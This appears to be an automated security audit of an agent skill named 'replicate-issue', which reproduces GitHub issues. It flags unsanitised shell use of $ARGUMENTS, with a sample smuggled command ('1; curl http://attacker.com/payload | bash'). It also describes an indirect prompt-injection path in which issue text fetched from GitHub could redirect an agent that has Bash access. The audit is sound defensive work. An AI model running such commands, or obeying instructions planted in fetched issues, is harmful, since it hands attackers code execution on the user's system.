The Agent Skills Directory

[COMMAND_EXECUTION]: The skill directly incorporates the $ARGUMENTS variable (intended for the GitHub issue number) into multiple shell commands without any sanitization or escaping. Examples include gh issue view $ARGUMENTS and file paths for screenshots like /tmp/issue-$ARGUMENTS-{step-name}.png. A malicious user could provide an input like 1; curl http://attacker.com/payload | bash to execute arbitrary code on the underlying system.
[PROMPT_INJECTION]: The skill is vulnerable to Indirect Prompt Injection (Category 8). 1. Ingestion points: The skill fetches external, untrusted content (title, body, comments) from GitHub issues in Phase 1.1. 2. Boundary markers: There are no delimiters or specific instructions to the agent to treat the fetched content as untrusted data rather than instructions. 3. Capability inventory: The skill possesses extensive system capabilities, including the Bash tool for command execution and the agent-browser for web automation. 4. Sanitization: No validation or sanitization is performed on the retrieved GitHub content before it is used to generate a 'Test Plan' in Phase 1.2. An attacker could craft a GitHub issue containing malicious instructions that the agent would then faithfully execute as part of its reproduction workflow.

replicate-issue